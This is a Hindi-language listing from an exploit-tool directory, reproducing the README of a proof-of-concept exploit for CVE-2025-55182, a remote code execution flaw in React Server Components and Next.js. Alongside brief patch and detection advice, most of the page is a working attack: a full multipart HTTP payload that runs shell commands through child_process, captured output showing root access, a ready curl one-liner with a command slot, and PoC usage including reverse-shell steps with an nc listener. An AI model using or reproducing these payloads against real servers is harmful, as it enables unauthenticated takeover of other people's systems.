Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182 — CVE-2025-55182 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: React Server Components में असुरक्षित डिसीरियलाइज़ेशन के माध्यम से बिना प्रमाणीकरण के RCE, जो कमजोर RSC/Next.js एंडपॉइंट्स पर मनमाना कमांड निष्पादन और रिवर्स शेल सक्षम करता है। | Kitploit
उपकरण/GitHubGitHub/0xblackash/cve-2025-55182
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHub0xblackash/cve-2025-55182

CVE-2025-55182

CVE-2025-55182 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: React Server Components में असुरक्षित डिसीरियलाइज़ेशन के माध्यम से बिना प्रमाणीकरण के RCE, जो कमजोर RSC/Next.js एंडपॉइंट्स पर मनमाना कमांड निष्पादन और रिवर्स शेल सक्षम करता है।

रिपॉजिटरी देखें
16 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🚨 CVE-2025-55182 — React2Shell

hq720

Severity CVSS Type Status

CVE-2025-55182 एक गंभीर रिमोट कोड एक्ज़ीक्यूशन (RCE) कमजोरी है जो React सर्वर कम्पोनेंट्स (RSC) को प्रभावित करती है।


📌 अवलोकन

यह कमजोरी अप्रमाणित हमलावरों को कमजोर सर्वरों पर मनमाना कोड निष्पादित करने की अनुमति देती है।

यह समस्या React सर्वर कम्पोनेंट सर्वर फंक्शन एंडपॉइंट्स में असुरक्षित डिसीरियलाइज़ेशन से उत्पन्न होती है। अनुचित सत्यापन विशेष रूप से तैयार किए गए अनुरोधों को दुर्भावनापूर्ण पेलोड निष्पादित करने की अनुमति देता है।


🧨 प्रभाव

  • 🌍 नेटवर्क पर शोषण योग्य
  • 🔓 कोई प्रमाणीकरण आवश्यक नहीं
  • ⚡ कम हमला जटिलता
  • 💥 पूर्ण सर्वर समझौता संभव
  • 📈 CVSS स्कोर: 10.0 (अधिकतम गंभीरता)

क्योंकि React-आधारित फ्रेमवर्क व्यापक रूप से तैनात हैं, हमले की सतह अत्यंत बड़ी है।


📦 प्रभावित पैकेज

कमजोर संस्करणों में शामिल हैं:

react-server-dom-webpack   19.0.0 – 19.2.0
react-server-dom-parcel    19.0.0 – 19.2.0
react-server-dom-turbopack 19.0.0 – 19.2.0

इन पैकेजों के ऊपर बने फ्रेमवर्क (जैसे, कमजोर संस्करणों का उपयोग करने वाले Next.js ऐप्स) भी प्रभावित हो सकते हैं।


🔎 तकनीकी मूल कारण

यह दोष निम्न कारणों से होता है:

  • सीरियलाइज़्ड इनपुट का असुरक्षित संचालन
  • सर्वर-साइड डिसीरियलाइज़ेशन कड़े सत्यापन से पहले होना
  • पर्याप्त एंडपॉइंट सुरक्षा का अभाव

यह हमलावरों को दुर्भावनापूर्ण पेलोड तैयार करने में सक्षम बनाता है जो सर्वर पर निष्पादित होते हैं।


🛠 उपाय

✅ तत्काल कार्रवाइयाँ

  • पैच किए गए React संस्करणों (19.2.1 या बाद के) में अपग्रेड करें
  • एप्लिकेशन को पुनर्निर्मित और पुनः तैनात करें
  • उजागर RSC एंडपॉइंट्स का ऑडिट करें
  • संदिग्ध POST अनुरोधों के लिए लॉग की निगरानी करें

🧪 पहचान युक्तियाँ

  • RSC एंडपॉइंट्स पर अप्रत्याशित POST अनुरोध
  • संदिग्ध सीरियलाइज़्ड पेलोड
  • असामान्य सर्वर-साइड कमांड निष्पादन

📚 सारांश

श्रेणीमान
कमजोरीरिमोट कोड एक्ज़ीक्यूशन
प्रमाणीकरण आवश्यक❌ नहीं
हमला वेक्टर🌐 नेटवर्क
गंभीरता🔴 गंभीर
जंगली में शोषण⚠️ हाँ

कैसे शोषण करें

POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 740

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

वापस आएगा:

HTTP/1.1 500 Internal Server Error
Vary: rsc, next-router-state-tree, next-router-prefetch, next-router-segment-prefetch, Accept-Encoding
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
x-nextjs-cache: HIT
x-nextjs-prerender: 1
Content-Type: text/x-component
Date: Fri, 05 Dec 2025 11:53:05 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 195

0:{"a":"$@1","f":"","b":"PAoMR732SpRI6Xw9cbfbD"}
1:E{"digest":"uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"}

CVE-2025-55182 2 CVE-2025-55182 3 CVE-2025-55182 4

उपयोग

┌──(kali㉿kali)-[~/Downloads]
└─$ curl -i -X POST http://10.48.133.212:3000/ \
-H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW" \
-H "Next-Action: x" \
-H "Next-Router-State-Tree: b5dce965" \
-H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0" \
--data-binary $'------WebKitFormBoundary7MA4YWxkTrZu0gW\r\nContent-Disposition: form-data; name="0"\r\n\r\n{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\\"$B1337\\\"}","_response":{"_prefix":"var res=process.mainModule.require(\'child_process\').execSync(\'<COMMAND>\').toString().trim();;;throw Object.assign(new Error(\'NEXT_REDIRECT\'),{digest:`${res}`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}\r\n------WebKitFormBoundary7MA4YWxkTrZu0gW\r\nContent-Disposition: form-data; name="1"\r\n\r\n"$@0"\r\n------WebKitFormBoundary7MA4YWxkTrZu0gW\r\nContent-Disposition: form-data; name="2"\r\n\r\n[]\r\n------WebKitFormBoundary7MA4YWxkTrZu0gW--'
HTTP/1.1 500 Internal Server Error
Vary: rsc, next-router-state-tree, next-router-prefetch, next-router-segment-prefetch, Accept-Encoding
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
x-nextjs-cache: HIT
x-nextjs-prerender: 1
Content-Type: text/x-component
Date: Sat, 28 Feb 2026 10:19:04 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked

0:{"a":"$@1","f":"","b":"3WpzTMYEK9QGOeqIBQxrR"}
1:E{"digest":"287088506"}
CVE-2025-55182 5 CVE-2025-55182 6
sudo python3 react2shell_poc.py http://10.48.133.212:3000 --cmd "whoami"
  • आउटपुट: ubuntu (या इसी तरह)।
sudo python3 react2shell_poc.py http://10.48.133.212:3000 --cmd "id"

रिवर्स शेल के लिए:

  • लिसनर: nc -lvnp 4444
  • चलाएँ: sudo python3 react2shell_poc.py http://10.48.133.212:3000 --rev-shell --rev-ip YOUR_IP --rev-port 4444
  • इसे वापस कनेक्ट करना चाहिए; प्रतिक्रिया डाइजेस्ट में 'shell_started' दिखाएगी।

⚠️ अंतिम नोट

यदि आपका एप्लिकेशन React सर्वर कम्पोनेंट्स का उपयोग करता है, तुरंत पैच करें। देरी से जोखिम बढ़ जाता है।


टूल डाउनलोड करें